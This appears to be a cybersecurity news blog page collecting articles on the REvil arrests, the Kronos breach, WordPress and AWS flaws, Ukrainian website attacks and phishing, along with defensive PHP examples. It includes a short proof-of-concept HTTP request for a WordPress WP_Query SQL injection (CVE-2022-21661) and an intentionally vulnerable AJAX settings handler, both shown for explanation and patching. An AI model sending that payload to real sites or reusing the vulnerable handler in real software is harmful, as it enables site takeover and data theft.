Saturday, January 18, 2025

Trying to make sense of the REvil Arrests by the FSB

CyberSecurity

On 14 January 2022, our seemingly quiet Friday afternoons were shattered by a piece of breaking news, detailing the arrest of several REvil (aka Sodinokibi) members. Ransomware members’ arrests are always welcomed – and even more so when they are followed by video evidence of the arrests (you gotta love them; shades of the Bourne Identity with the camerawork!). 

However, the team’s first reaction was nothing short of a surprise. Why is that? This time the news came from an unusual source: the Russian Federal Security Service (FSB, or Федеральная служба безопасности in Russian). Before delving into why this was a strange move and how we’re making sense of it, let’s discuss the facts. 

According to a press release published on its website, the FSB carried out these arrests following a request from the United States that came with detailed information on the operators of this ransomware and their previous activities.

In cooperation with the Investigation Department of the Russian Ministry of Internal Affairs, the FSB conducted several raids to seize members’ assets, including more than 426 million rubles (part of it in cryptocurrency), 600 thousand US dollars, 500 thousand euros, computer equipment, the crypto wallets used to commit the crimes, and 20 luxury cars bought with the proceeds.

Footage from the members’ arrest

The report further claims that as a result of this operation, the REvil gang no longer exists, and the technological infrastructure used to conduct their attacks has been “neutralized.”

Interestingly enough, the press release states that the arrested members are being charged under Part 2 of Art. 187 (“Illegal circulation of means of payment”) of the Criminal Code of Russia, without any mention of charges related to computer-fraud activities.

WHO WAS REVIL (SODINOKIBI)?

The ransomware group REvil (aka Sodinokibi) has been one of the most significant characters in the evolving ransomware drama playing out over the past few years. The REvil ransomware variant was first detected in April 2019, and although the group initially focused on targeting Asia-based entities, the ransomware operators and associated affiliates became indiscriminate in their choice of victim and sector (apart from Russia-based organizations, as per ransomware tradition). REvil’s bold and brazen attacks, such as targeting the Kaseya desktop management software and the meat processing organization JBS, meant that the group has rarely been out of the news. 

The group suddenly disappeared from the scene in July 2021, after presumably gathering enough money to retire happily on a remote island somewhere (although they’ve probably been in some decadent Russian outskirts).

What happened to them?

We still have no clue, but we tried to figure it out with our Analysis of Competing Hypotheses exercise that we carried out last summer. After that, the group stopped carrying out attacks, and one of its representatives showed up in October to discuss their domains’ alleged hijacking and the group’s intention to disappear from the scene. 

And then after that? Absolutely nothing. No one had heard from the group’s members until today. As I said before, we couldn’t help but be surprised by this supposed Russian-American cooperation in the arrest of these 14 REvil members – and we’re left with one simple question: “Why?”

GEOPOLITICAL SITUATION AND UNATTRIBUTED CYBERATTACKS

Before analyzing these arrests, let’s take a step back to analyze the bigger picture. From a geopolitical perspective, we’ve observed a growing tension between Russia and Ukraine in the past weeks. Russia conducted a build-up of more than 100,000 of its troops along the Ukrainian border and conducted several military exercises.

Recent talks between the West and Russia to defuse the crisis also appear to have reached an impasse; this week, a top Russian negotiator said diplomatic efforts had reached a “dead end.” There are credible fears of another Russian invasion of Ukraine, with Russia reportedly compelled to react to Ukraine’s attempts to move towards NATO membership, which would deepen its military and economic ties with the West.

In an operation possibly tied to what we’ve just discussed, today we saw reports emerging of a significant defacement cyberattack hitting several Ukrainian government websites and making them inaccessible.

The attack came with an ominous warning for Ukrainians, stating they should “be afraid and expect the worst.” This attack reportedly targeted 15 websites in Ukraine that used the October content management system and resulted in websites being defaced. This included the Ministry of Foreign Affairs, Cabinet of Ministers, Treasury, and others.

Attribution for this attack is still uncertain, but the tactics, techniques, and procedures (TTPs) of the attack – along with a suspicious timeline – suggest that a Russian state-encouraged actor may have been behind it.

MAKING SENSE OF THESE ARRESTS

This leads to today’s arrests. The cooperation and the timing of these arrests definitely seem noteworthy to us. We’re used to seeing Russia and the US in opposition when discussing cyber-related events, not cooperating against cybercriminal operations. So why did the FSB conduct these arrests?

At the time of writing, we don’t have a definitive answer. However, based on the events observed historically, we can assess the reasons behind this operation. These arrests seem to indicate some sort of willingness to provide concessions to the US and its allies, or at the very least, some semblance of cooperation. For example, they may signal increased cooperation in the cybersphere should diplomatic negotiations between the two countries evolve into conditions more favorable to Moscow.

Additionally, it is important to note that REvil has not been active for several months now. Therefore, behind an apparent sign of goodwill, we have to stress that REvil could serve as a scapegoat for other ransomware operations, and thus – again – as a demonstration of what cooperation between Russia and the US could look like under the right conditions.

When these big events in the cybersphere happen, it is always important to monitor how cybercriminals react. Echoing what we mentioned above, chatter on Russian cybercriminal forums suggested that REvil were “pawns in a big political game”. In addition, another user suggested that Russia made the arrests “on purpose” so that the United States would “calm down” (in relation to potential sanctions tied to the Ukrainian border disputes). 

Forum user suggesting REvil members have been used as pawns

It’s possible that the FSB raided REvil knowing that the group was high on the priority list for the US, while considering that their removal would have a small impact on the current ransomware landscape. These arrests could also have served a secondary purpose to warn other ransomware groups. REvil made international news last year in its targeting of organizations such as JBS and Kaseya, which were high profile and impactful attacks; a very public series of raids could be interpreted by some as a message to be mindful of their targeting.   

Ultimately, these arrests represent a significant display of potential cooperation, but behind them lie critical caveats that need to be taken into account in a deeper assessment.


Kronos hackers stole personal info of Metro-North workers, MTA says

CyberSecurity

Ransomware hackers who breached the network of MTA timeclock provider Kronos made off with the personal information of several current and former Metro-North employees, transit leadership said Thursday.

“Kronos recently informed us that some files containing personal information of some current and former MTA employees at one of our agencies – Metro-North Railroad – were accessed by the perpetrators of this ransomware incident,” MTA Chief Administrative Officer Lisette Camilo said in an email to the authority’s approximately 70,000 employees.

“The information accessed did not include Social Security numbers, driver’s license numbers, bank or other financial institution account numbers, or biometric information,” Camilo’s email said. “At this time, Kronos has no evidence that the personal information of any other MTA employees was accessed.”

The MTA has arranged with Kronos and its parent company to offer all current and former employees two years of free credit monitoring and identity theft protection in the wake of the stolen information, the email said.

The back-end of the MTA’s high-end timekeeping system went dark Dec. 13 after Kronos experienced the ransomware attack over the previous weekend.


Three Plugins with Same Bug Put 84K WordPress Sites at Risk

wordpress

Researchers discovered vulnerabilities that can allow for full site takeover in login and e-commerce add-ons for the popular website-building platform.

Researchers have discovered three WordPress plug-ins with the same vulnerability that allows an attacker to update arbitrary site options on a vulnerable site and completely take it over. Exploiting the flaw does require some action from the site administrator, however.

On Nov. 5, 2021, the Wordfence Threat Intelligence team started a process to disclose a vulnerability researchers had found in “Login/Signup Popup,” a WordPress plug-in installed on more than 20,000 sites, Wordfence’s Chloe Chamberland wrote in a post published online Thursday.

However, a few days later they discovered that the flaw was present in two other plug-ins by the same developer, who goes by the online name of XootiX. They are “Side Cart Woocommerce (Ajax),” which has been installed on more than 60,000 sites, and “Waitlist Woocommerce (Back in stock notifier),” which has been installed on more than 4,000.

Login/Signup Popup is a “simple and lightweight” plug-in aimed at streamlining a site’s registration, login and password reset processes, according to its description online. Side Cart Woocommerce – designed to work with the Woocommerce plugin for creating an e-commerce store – allows a site’s users to access the items they’ve placed into a shopping cart from anywhere on the site. Waitlist Woocommerce – also to be used with Woocommerce – adds the functionality of tracking demand for out-of-stock items to an e-commerce site.

As of now, all of the plug-ins have been updated and the flaw patched, according to the post. On Nov. 24, the developer released a patched version of Login/Signup Popup as version 2.3. Later, on Dec. 17, a patched version of Waitlist Woocommerce, version 2.5.2, was released; and a patched version of Side Cart Woocommerce, version 2.1, was released.

Still, the discovery of the bug’s multiple occurrences reflects an ongoing issue with WordPress plug-ins being riddled with flaws. Indeed, vulnerabilities in the plug-ins skyrocketed with triple-digit growth in 2021, according to RiskBased Security.


How the Flaw Works

The vulnerability found by the Wordfence team is fairly straightforward, Chamberland wrote. All three plug-ins register the save_settings function, which is initiated via a wp_ajax action, they said.

In each of the plug-ins, “this function was missing a nonce check, which meant that there was no validation on the integrity of who was conducting the request,” according to the post.

What this sets up is a scenario in which an attacker can craft a request that would trigger the AJAX action and execute the function, Chamberland wrote. However, action from the site’s administrator – “like clicking on a link or browsing to a certain website while the administrator was authenticated to the target site” – is needed to fully exploit the flaw, she said.

In these cases, “the request would be successfully sent and trigger the action which would allow the attacker to update arbitrary options on that website,” she explained in the post.

Exploiting Arbitrary Options Update vulnerabilities in this way is something threat actors “frequently abuse,” allowing them to update any option on a WordPress website and ultimately take it over, Chamberland noted.

This takeover happens if an attacker sets “the user_can_register option to true and the default_role option to the administrator so that they can register on the vulnerable site as an administrator,” she explained.
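To make the missing check concrete, the following is an added example, not code from the XootiX plug-ins or from Wordfence. It shows a minimal AJAX “save settings” handler in the shape the post describes (registered on a wp_ajax action, no nonce check) beside a hardened version that verifies a nonce, checks the capability, and allow-lists the options it will write. The hook names, option names, nonce action and settings-page hook suffix are assumptions chosen for the example.

```php
<?php
/**
 * Added example, not code from the affected plug-ins. It shows the pattern the
 * post describes (an AJAX "save settings" handler registered on wp_ajax_* with
 * no nonce check) beside a hardened version. Hook names, option names, the
 * nonce action and the settings-page hook suffix are assumptions.
 */

// --- Vulnerable shape ----------------------------------------------------
// wp_ajax_* handlers run only for logged-in users, so the site admin must be
// authenticated. Without a nonce, nothing ties the request to a form the
// admin actually submitted, so a request triggered by a page the admin visits
// elsewhere (CSRF) is accepted and writes whatever option it names.
add_action( 'wp_ajax_example_save_settings_vuln', 'example_save_settings_vuln' );
function example_save_settings_vuln() {
    $name  = sanitize_key( $_POST['option'] ?? '' );
    $value = sanitize_text_field( wp_unslash( $_POST['value'] ?? '' ) );
    update_option( $name, $value );   // arbitrary option update
    wp_send_json_success();
}

// --- Hardened shape ------------------------------------------------------
// Only options this plug-in owns may be written, each through a validator.
const EXAMPLE_ALLOWED_OPTIONS = array(
    'example_popup_enabled' => 'example_validate_bool',
    'example_popup_text'    => 'sanitize_text_field',
);

function example_validate_bool( $raw ) {
    return in_array( $raw, array( '1', 'true', 'on' ), true ) ? '1' : '0';
}

add_action( 'wp_ajax_example_save_settings', 'example_save_settings' );
function example_save_settings() {
    // 1. Nonce: proves the request originated from this plug-in's settings
    //    page for this user. Dies with HTTP 403 when missing or invalid.
    check_ajax_referer( 'example_save_settings', 'nonce' );

    // 2. Capability: being logged in is not enough; only admins change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 ); // exits
    }

    // 3. Allow-list: user_can_register, default_role, siteurl and the like are
    //    never reachable through this handler, whatever the request names.
    $name = sanitize_key( $_POST['option'] ?? '' );
    if ( ! isset( EXAMPLE_ALLOWED_OPTIONS[ $name ] ) ) {
        wp_send_json_error( 'unknown option', 400 ); // exits
    }
    $validator = EXAMPLE_ALLOWED_OPTIONS[ $name ];
    $value     = call_user_func( $validator, wp_unslash( $_POST['value'] ?? '' ) );

    update_option( $name, $value );
    wp_send_json_success( array( 'option' => $name, 'value' => $value ) );
}

// The settings page hands the nonce to its script; the client sends it back
// as the "nonce" POST field that check_ajax_referer() looks for above.
add_action( 'admin_enqueue_scripts', function ( $hook ) {
    if ( 'settings_page_example' !== $hook ) {   // assumed page hook suffix
        return;
    }
    wp_enqueue_script( 'example-settings', plugins_url( 'settings.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-settings', 'exampleSettings', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_save_settings' ),
    ) );
} );
```

The three checks are independent: the nonce defeats the cross-site request the post describes, the capability check stops a low-privileged account from reaching the handler at all, and the allow-list limits the blast radius even if both earlier checks were somehow bypassed, because the handler can no longer touch user_can_register or default_role.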

Risks and Mitigations

Though the fact that the flaws found in the plug-ins require administrator action makes them “less likely to be exploited,” they can have a “significant impact” if they are exploited, Chamberland said.

“As such, it serves as an incredibly important reminder to remain aware when clicking on links or attachments and to ensure that you are regularly keeping your plug-ins and themes up to date,” she advised.

Recommended actions for WordPress users who use the plug-ins are to verify that their site has been updated to the latest patched version available for each of them. That would be version 2.3 for “Login/Signup Popup”, version 2.5.2 for “Waitlist Woocommerce (Back in stock notifier)”, and version 2.1 for “Side Cart Woocommerce (Ajax),” according to the post.

All Wordfence users are protected against the vulnerability, according to the post. Wordfence Premium users received a firewall rule to protect against any exploits targeting them on Nov. 5, and sites still using the free version of Wordfence received the same protection on Dec. 5.


FSB arrests REvil ransomware gang members

russia

The Russian Federal Security Service (FSB) said today that it has raided and shut down the operations of the REvil ransomware gang.

Raids were conducted today at 25 residences owned by 14 members suspected to be part of the REvil team across Moscow, St. Petersburg, Leningrad, and the Lipetsk regions.

This comes just a day after Ukrainian authorities confirmed they had made arrests including one of an alleged ransomware gang ringleader.

Authorities said they seized more than 426 million rubles, $600,000, and €500,000 in cash, along with cryptocurrency wallets, computers, and 20 expensive cars.

“The detained members of the [organized criminal structure] were charged with committing crimes under Part 2 of Art. 187 ‘Illegal circulation of means of payment’ of the Criminal Code of Russia,” the FSB said in a press release today.

The FSB, which serves as Russia’s internal intelligence agency, said it conducted its operation at the request of US authorities, which have been notified of the results.

The raid comes after President Biden and US authorities have pressured Russian President Vladimir Putin repeatedly over the summer to crack down on the Russian underground cybercrime ecosystem, which harbors many of today’s top ransomware crews.

Kaseya attack aftermath

The REvil gang was one of the most active ransomware crews last year, being responsible for the attack against JBS Foods, which impacted the meat supply across the US and Australia in May, and the attack on IT provider Kaseya during the 4th of July weekend.

After US authorities started pressuring Russian officials, the REvil gang shuttered operations in July but then attempted a comeback in September before having some of their dark web servers seized by US authorities.

Seven other REvil gang members were also arrested throughout 2021, following operations coordinated by Europol.

The FSB has not released the names of any of the suspects.

“Representatives of the competent US authorities were informed about the results of the operation,” the agency said.


AWS Patches Glue Bug That Put Customer Data at Risk

aws

Dubbed “Superglue” by the Orca Security Research Team, the bug was made possible by an internal misconfiguration within the service.

AWS Glue is a serverless data integration service that allows customers to discover and combine data for machine learning, analytics and app development. Given that it can access large volumes of potentially sensitive data, it could be an attractive target for hackers.

“During our research, we were able to identify a feature in AWS Glue that could be exploited to obtain credentials to a role within the AWS service’s own account, which provided us full access to the internal service API,” Orca Security explained.

“In combination with an internal misconfiguration in the Glue internal service API, we were able to further escalate privileges within the account to the point where we had unrestricted access to all resources for the service in the region, including full administrative privileges.”

The vendor claimed to have been able to assume roles in AWS customer accounts that are trusted by Glue and query and modify AWS Glue service-related resources in a region. These included Glue jobs, dev endpoints, workflows, crawlers and triggers.

The research team was at pains to point out that it only used its own accounts for this project and that no AWS Glue customers were compromised as a result.

AWS worked swiftly with the team to fix the problem.

“Today, Orca Security, a valued AWS partner, helped us detect and mitigate a misconfiguration before it could impact any customers,” explained AWS principal engineer Anthony Virtuoso.

“We greatly appreciate their talent and vigilance, and we would like to thank them for the shared passion of protecting AWS customers through their findings.”

The same research team revealed a second vulnerability in AWS this week dubbed “BreakingFormation.”

Also now fixed by AWS, this zero-day bug could have allowed attackers to leak sensitive files on targeted service machines and grab credentials related to internal AWS infrastructure services.


Ukrainian Government Websites Forced Offline in “Massive” Cyber-Attack


The attack, which also targeted the UK, US and Swedish embassies in Ukraine, is suspected to have been perpetrated by Russian threat actors amid significant tensions between the two nations.

Ukraine has been hit by a “massive” cyber-attack, forcing more than a dozen government websites offline, it has been reported today.

This attack comes just a day after we were able to report that Ukrainian authorities made a number of arrests including that of an alleged ransomware ringleader.

The websites taken offline include the Ukrainian ministry of foreign affairs and the education ministry. Before going down, a sinister message appeared stating: “Ukrainians! … All information about you has become public. Be afraid and expect worse. It’s your past, present and future.”

The message also reproduced the Ukrainian flag and map crossed out and referenced “historical land.” This appeared in three languages: Ukrainian, Russian and Polish.

The Guardian quoted the Ukrainian foreign ministry’s spokesperson, Oleg Nikolenko, who said: “As a result of a massive cyber-attack, the website of the ministry of foreign affairs and other government agencies are temporarily down.

“Our specialists have already started restoring the work of IT systems, and the cyber-police has opened an investigation.”

Ukraine’s SBU security service said that no personal data was leaked in the attack.

The incident has come amid heightened tensions in the region, with the Kremlin demanding assurances that Ukraine will not join Nato. Russia has deployed 100,000 troops to the border with Ukraine.

The EU’s top diplomat, Josep Borrell, condemned the attacks, stating: “We are going to mobilize all our resources to help Ukraine to tackle this. Sadly, we knew it could happen.”

He added: “I can’t blame anybody as I have no proof. But we can imagine.”

Commenting on the story, Anthony Gilbert, cyber threat intelligence lead at Bridewell Consulting, said: “At the moment it’s unclear how the attack occurred or who is behind it, but given the current situation, it’s highly likely it was politically charged as there appears to be no financial motivation. The attackers probably wanted to give a warning or ignite civil unrest and spread further undercurrents of no confidence in the government.”

Toby Lewis, global head of threat analysis at Darktrace, said it was too early to jump to conclusions about the nature of the attack and its perpetrators. “We should be cautious around labelling this as a ‘sophisticated’ attack. Some cyber-attacks are more successful than others; some are advanced and others less so. A distributed denial of service (DDoS) attack, for example, which is an attempt to bring down websites or networks by overwhelming the webserver with internet traffic, is not particularly sophisticated and relatively easy to mitigate.

“Some of the website defacements, such as those left on the education website and the ministry of foreign affairs, are designed to mimic ‘nationalist/separatist groups’ with claims that the attack was done in the name of the UPA (Ukrainian Separatist Army), which has not existed for over 50 years. Attribution is impossible to do with digital data alone, and it is not unlikely that this is a false flag to divert attention away from the true perpetrators, to stir up unrest or simply impact the credibility of the website owners.”

Russia has previously been blamed for cyber-attacks on Ukraine in recent years. These include attacks in 2015 and 2016 that took out large parts of the country’s power grids.


Report: In 2021 North Korea Hacked Nearly $400M in Crypto

north korea

North Korean hackers launched at least seven attacks on cryptocurrency platforms last year to steal almost $400 million worth of digital assets, according to a report by blockchain analysis firm Chainalysis. 

“From 2020 to 2021, the number of North Korean-linked hacks jumped from four to seven, and the value extracted from these hacks grew by 40%,” the report said.  

The attacks primarily targeted investment firms and centralized exchanges. 

The report stated that the hackers siphoned the funds from the organizations’ internet-connected “hot wallets” into DPRK-controlled addresses by using complex tactics including phishing lures, code exploits, malware, and advanced social engineering.

“Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out,” the report said.  

In 2021, Ethereum and Bitcoin accounted for 58% and 20% of the funds, respectively; 22% came from ERC-20 tokens or altcoins. 

The report also said, citing the United Nations Security Council, that North Korea used the money obtained from these hacks to support its weapons of mass destruction (WMD) and ballistic missile-related programs.

As per the analysis report, the Lazarus Group — a hacking group that is part of North Korea’s primary intelligence agency, the Reconnaissance General Bureau — is suspected of carrying out the attacks. The Lazarus Group has previously been accused of the cyberattack on Sony Pictures Entertainment and of WannaCry.

More than 65% of North Korea’s stolen funds were laundered through mixers — software tools that pool and scramble digital assets from thousands of addresses. 

North Korea also owns unlaundered crypto funds, which are believed to be worth $170 million, from 49 separate hacks spanning from 2017 to 2021. 

“It’s unclear why the hackers would still be sitting on these funds, but it could be that they are hoping law enforcement interest in the cases will die down, so they can cash out without being watched. Whatever the reason may be, the length of time that DPRK is willing to hold on to these funds is illuminating, because it suggests a careful plan, not a desperate and hasty one,” the report said. 


WordPress Core 5.8.2 – ‘WP_Query’ SQL Injection [PoC]

EXPLOIT
# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress[.]org
# Software Link: https://wordpress[.]org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661

# [ VULNERABILITY DETAILS ] : 

# This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core.
# Authentication is not required to exploit this vulnerability. The specific flaw exists within the WP_Query class.
# The issue results from the lack of proper validation of a user-supplied string before it is used to construct SQL queries.
# An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

# [ References ] : 

https://wordpress[.]org/news/category/releases
https://www.zerodayinitiative[.]com/advisories/ZDI-22-020
https://hackerone[.]com/reports/1378209

# [ Sample Request ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

How to fix?

Update to => 5.8.3
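As an added defensive example (not part of the exploit listing above, and not the WordPress 5.8.3 patch), the following must-use plug-in enforces on every WP_Query the integer type that term_taxonomy_id terms should have, before WP_Tax_Query turns the tax_query array into SQL. It assumes the tax_query array may be rewritten on the pre_get_posts action, which runs in WP_Query::get_posts() before the taxonomy clauses are generated; the function name example_harden_tax_query is an assumption for this example. It is a stop-gap and detection layer only; updating to 5.8.3 remains the fix.

```php
<?php
/**
 * Added example (mu-plugin), not part of the exploit listing above and not the
 * WordPress 5.8.3 patch. Installing the update is the actual fix; this is a
 * defence-in-depth layer that enforces the type term_taxonomy_id terms should
 * have before WP_Tax_Query turns them into SQL.
 *
 * Assumption: the tax_query array may be rewritten on pre_get_posts, which
 * runs in WP_Query::get_posts() before the taxonomy clauses are generated.
 */

/**
 * Walk a tax_query array (which may nest groups of clauses under numeric keys,
 * with a 'relation' key at each level) and return a copy in which every clause
 * that matches on term_taxonomy_id carries only integers in 'terms'. Anything
 * else in such a clause is dropped, and $dropped counts the removals.
 */
function example_harden_tax_query( array $tax_query, &$dropped = 0 ) {
    foreach ( $tax_query as $key => $clause ) {
        if ( 'relation' === $key || ! is_array( $clause ) ) {
            continue;                       // AND/OR relation or malformed entry
        }
        if ( isset( $clause['taxonomy'] ) || isset( $clause['terms'] ) ) {
            // A leaf clause.
            if ( 'term_taxonomy_id' === ( $clause['field'] ?? '' ) ) {
                $terms = (array) ( $clause['terms'] ?? array() );
                $clean = array();
                foreach ( $terms as $term ) {
                    // Accept only an integer, as a number or as a string of
                    // digits; reject anything with spaces, operators or dots.
                    if ( is_int( $term ) || ( is_string( $term ) && ctype_digit( $term ) ) ) {
                        $clean[] = (int) $term;
                    } else {
                        $dropped++;
                    }
                }
                $clause['terms'] = $clean;
            }
            $tax_query[ $key ] = $clause;
        } else {
            // A nested group of clauses: recurse.
            $tax_query[ $key ] = example_harden_tax_query( $clause, $dropped );
        }
    }
    return $tax_query;
}

add_action( 'pre_get_posts', function ( WP_Query $query ) {
    $tax_query = $query->get( 'tax_query' );
    if ( empty( $tax_query ) || ! is_array( $tax_query ) ) {
        return;
    }
    $dropped = 0;
    $query->set( 'tax_query', example_harden_tax_query( $tax_query, $dropped ) );
    if ( $dropped > 0 ) {
        // Detection: a non-integer term_taxonomy_id term is never legitimate,
        // so a dropped term is worth alerting on, not just silently fixing.
        error_log( sprintf(
            'tax_query hardening dropped %d non-integer term_taxonomy_id term(s) on %s',
            $dropped,
            $_SERVER['REQUEST_URI'] ?? 'unknown'
        ) );
    }
} );
```

Dropped in wp-content/mu-plugins/, the file loads on every request without activation. The error_log line is the useful part for a defender: on a site that cannot be updated immediately, any hit on it is a signal that someone is feeding non-numeric terms into a term_taxonomy_id clause, which no normal theme or plug-in does.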


Teen Security Specialist gains remote control of over 20 Teslas

tesla hacked

Teen Gains Full control over car doors, security system, and more

Facepalm: This week, a teenager reported that he has gained remote access to around two dozen Tesla cars in multiple countries and is trying to contact their owners. The list of things he can do to the affected vehicles is long and dangerous.

Nineteen-year-old IT security specialist David Columbo reported in a Twitter thread on Monday and Tuesday, 10-11 January 2022, that he had gained complete control of over 25 Teslas in 13 countries without their owners knowing. He doesn’t want to disclose exactly how he did it until he reports the vulnerability to the non-profit MITRE. However, Columbo did say it was due to errors on the owners’ part, not a security flaw in Tesla’s software.

Columbo said he could search the precise location of each car, disable their security, open their doors and windows even while they’re on the road, play music and YouTube videos at full volume, and more. While Columbo can’t remotely drive the cars, he could steal them if he were at their physical locations.

Tesla’s security team has already told Columbo they’re looking into it.

Even though Columbo says this isn’t Tesla’s fault, it could still be a PR issue for the company, painting the cars as ever more vulnerable in consumers’ minds. Near the end of last year, Tesla recalled a significant number of vehicles sold in the US over trunk lid problems. This incident could also affect the development of Tesla’s self-driving mode, which is still in beta.

Real InfoSecurity reached out to Tesla this evening and was able to confirm the correspondence between the security researcher and Tesla.


How Cybercriminals Are Cashing in on a Culture of ‘Yes’

CyberSecurity

What is the culture of Yes?

It’s hard to say no. To friends asking you to help them move next weekend, to a second helping of Grandma’s pumpkin pie, and especially to that pop-up window that asks for your personal data online. We’re wired to always respond with “yes.”

And the reason for this behaviour is fairly straightforward: The carrot is always more apparent (and attractive) than the stick. Whether it’s for access to the latest celebrity gossip, updates on local news, or acquiring the latest “toy of the year” for your children, the reward is always front of mind. The potential harm of giving out an email or a phone number doesn’t immediately reveal itself.


Casualties of the Culture of Yes
This default “yes” has long been exploited by threat actors. Some attacks cast a wide net to entice everyone, such as the recent GriftHorse malware that infected over 10 million Android phones. Notifications promised special offers in exchange for the user’s phone number, which the scammer then used to surreptitiously sign up the user for a $35-per-month service.

Other malicious actions might target specific, powerful individuals, an approach often favoured by nation-states. In this approach, phishing emails may promise access to resources or webinars in exchange for emails and passwords. This tactic has been used in several recent hacking efforts associated with Russia and Iran.

And while it may seem isolated to the consumer realm, the issue is affecting enterprises as well. A recent survey showed that 59% of workers are using corporate emails for personal use, opening them up to phishing attacks looking for someone to say yes. A full 46% of Gen Z survey participants would open up the link or attachment in a suspected phishing email, potentially providing a banner day for the authors of the malicious email.

Continued Reinforcement of the Yes
Our culture is also reinforcing the culture of yes through new technology and usage patterns. For example, the rise in “touchless experiences” during the pandemic has given new life to QR codes — if you see it, you scan it. QR codes rely upon the default yes that we’ve all grown accustomed to. These visual bookmarks, while useful, subject people to the same risks as the GriftHorse campaign: The browser is sent to an unknown, potentially malicious site.

While consumers are learning to be wary of unknown sites and applications, QR codes without guardrails open them back up to potentially dangerous locations and code that seeks to do them harm or can secretly log their location by essentially “checking them in” at a particular place and time via device fingerprinting.

This culture of yes, then, presents real dangers to both our privacy and security. But the answer to this moment — this world in which the default response is yes — is not to become completely cynical about the world and everyone in it. We must resist the temptation to flip to the other extreme, a default “no.” Instead, it’s more of a reset in our thinking — an attempt to find a balance between extremes as we interact in the digital world.

How to Find Balance (and Security) for Your Organization
Shifting from a culture of yes to a more thoughtful, balanced perspective requires three things: technology, training, and commitment.

First, technology must be used to inform and modify behaviour; thoughtful choices then become easier for people than just saying “yes.” To combat phishing, for example, clear identification of external emails can help users identify suspicious content. Along with clear identification of risk, phish reporting buttons should be prominent in the interface so that it’s obvious what to do with suspect email. Doing the legwork for the user funnels them into making good choices. These measures can be enhanced with technology that should be table stakes for organizations already: browser isolation, endpoint detection and response, and the like.

Second, once the technology is in place, we must train our people on how to use it effectively. Part of this is informative videos or seminars, but a feedback loop such as a Slack channel for informal advice is also helpful — this builds community awareness and rapport between the security team and the rest of the organization. Conducting regular phishing tests will also reinforce good habits and provide qualitative analysis of how the culture change is progressing.

Finally, stay committed to your progress. If tactics are switched up too frequently, or if the culture change is not fully supported by leadership, any shift in thinking will likely cause users to revert to the previous pattern of always saying yes to everything.

Rather than extremes, a thoughtful balance is essential if we are to ensure that our culture is served by our technology. The alternative is to sacrifice our privacy and security in our race to always say “yes.”
